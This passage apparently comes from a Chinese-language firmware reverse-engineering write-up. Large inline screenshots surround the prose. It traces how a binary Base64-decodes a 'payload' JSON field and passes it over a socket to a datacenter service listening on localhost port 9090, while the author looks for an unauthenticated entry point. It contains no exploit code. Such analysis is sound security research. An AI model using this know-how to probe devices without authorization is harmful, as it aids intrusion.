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
|
|||
|
|
<p blockindex=37><code>sub_1F1F8</code>函数看上去是做了一些编码转换的操作,可以猜测到这里就是做了<code>Base64</code>的解码工作。我们很容易根据其中抛出的异常信息确认我们的猜测,这里的确就是将<code>payload</code>字段内的<code>Json</code>数据进行了<code>Base64</code>解码。</p>
|
|||
|
|
<p blockindex=38><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=39>我们再返回到主函数,进而当<code>*(a2 + 8)</code>即传入的第一个参数<code>option</code>为<code>0</code>时,会执行到<code>sub_1BAE0</code>函数,根据上文分析,其参数<code>v11</code>就是解码后的<code>Json</code>字符串。</p>
|
|||
|
|
<p blockindex=40><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=41>在<code>sub_1BAE0</code>函数中,创建了<code>socket</code>,结合传入的参数(上级的<code>v11</code>变量)是<code>Json</code>字符串,很容易判断出此处会将<code>payload</code>字段的<code>Json</code>数据发送给本地<code>127.0.0.1</code>的<code>9090</code>端口(这里保护了端口的安全性,没有对外开放,我们想要找到未授权口而悬着的心也终于死了)。</p>
|
|||
|
|
<p blockindex=42><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=43><code>/usr/sbin/datacenter</code>程序一直挂在进程中,监听着<code>9090</code>端口,故我们的数据被传到了<code>datacenter</code>程序进一步处理。</p>
|
|||
|
|
<p blockindex=44><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA6EAAADdCAYAAABKU3QNAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nO3dT2wj6Znn+S/d1T122263y8qk/3QfCiYTIxWBwcz6RFkQoD4spESjE6uCTm744qUSyIN0KfSlABWBujTqQh0Epzi+GPaJSC2yMUgSi8UIkGURe/D2YgCm2Eiyt4CGq8fKZNuedtmutj2OPQQfkXzJYASlCJLK/H0AIVNkMOKNN15S8fB5/6Q8z/MQERERERERmYJPzLoAIiIiIiIi8upIJAjdX4bUdhJ7voFqR6RSR9SuuE3n9CHFYpHiUTOhAgI02U4V2R5byBuos89yMUXq4T5t2uw/TJEqLrPfmXXBXjKR6vklbWMiIiIiMrH5zoTWIJUa/hm4kQ3YZiAIHrHNfnvE4bbHHKerve/saxlG7Kq78SnLGw3ypVXWr7MNkL59a8yzITqnPCwWCY5jF3m7lKa8EWOQ0IRi0f8ZddjOaff5o5iON8rCHXJDD+a4szC8aft0mVQxRepodAXUjlL+892f7YGTqrFdHHw+eNsImtsDr18+DWxh09kPIfUTqZ4TaGMiIiIiciO9NusCRFH1GBughW6zDv0jX9v7kM0CLdjJ+I/Vt